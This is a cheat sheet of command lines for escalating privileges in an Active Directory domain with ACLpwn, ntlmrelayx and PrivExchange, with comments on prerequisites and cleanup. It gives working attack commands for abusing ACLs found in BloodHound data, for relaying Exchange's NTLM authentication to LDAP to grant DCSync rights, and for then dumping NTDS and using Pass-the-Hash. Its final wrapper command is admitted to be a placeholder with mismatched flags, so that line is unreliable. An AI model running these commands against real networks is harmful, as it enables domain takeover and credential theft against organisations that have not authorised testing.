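# PrivExchange / ACLpwn cheat sheet. These are example command lines, not a
# runnable script: hostnames, users and passwords are placeholders taken from
# the tools' READMEs. Passwords given on the command line end up in shell
# history and in `ps` output on the attacking host.
#
# After exploitation you are NOT Domain Admin, so you cannot log on to the DC
# with Domain Admin rights. What the exploit grants is DCSync (replication)
# rights on the domain, which is enough to dump the NTDS database. Pass-the-Hash
# with an administrator account's NT hash from that dump gives real admin access.
# Clean up afterwards: replication rights left on a low-privilege account are a
# persistent backdoor.


# ACLpwn finds compromise paths in BloodHound data and exploits them (it changes
# ACLs in the directory). BloodHound's Neo4j database must be running; -du/-dp
# are its credentials. Many options are available: -f is the object the path
# starts from (the one you control) and -ft its type, -d the target domain.

# Dry run: only look for a compromise path, change nothing in AD
python aclpwn.py -f user -ft user -d domain -u user -p password -sp password -du neo4j -dp password -dry

# Without -dry, exploitation is started as soon as a path is found.
# aclpwn writes the ACL changes it makes to a restore file; keep that file.
python aclpwn.py -f user -ft user -d domain -u user -p password -sp password -du neo4j -dp password

# Restore the previous privileges after exploitation (undo the ACL changes)
python aclpwn.py -r restore-file


# NTLM relaying: relay the Exchange server's incoming connection to LDAP on the
# DC and give the named user DCSync privileges (--escalate-user). Start this
# first, in its own terminal; it waits for the connection. Relaying to plain
# ldap:// fails if the DC enforces LDAP signing.
ntlmrelayx.py -t ldap://s2016dc.testsegment.local --escalate-user ntu

# The user needs a mailbox to exploit this way (the push-notification
# subscription is registered through Exchange as that user). After a minute
# (the value supplied for the push notification) the relayed connection shows
# up in ntlmrelayx. -ah is the attacker host Exchange connects back to; the
# positional argument is the Exchange server.
python privexchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u testuser -d testsegment.local

# You can also perform the attack without any credentials, using the attack
# module file that ships with the tool (presumably the ntlmrelayx HTTP attack
# module; the file name was lost from these notes -- check the PrivExchange
# repository). It relays credentials captured on the network via LLMNR / NBT-NS
# poisoning, so it only works on a segment where victims resolve names that way.


# "All in one" PrivExchange wrapper: only the web server port has to be opened,
# so no high privileges are required on the attacking host. Many options
# available; -d needs the domain name.
# NOTE(review): the script name was lost from this line and the flag set
# (-ah/-ap/-th DCip MailServerip) does not match privexchange.py's own options,
# so confirm which wrapper this is before running. all_in_one.py is a placeholder.
python all_in_one.py -ah attackerip -ap listenport -u user -p password -d domain -th DCip MailServerip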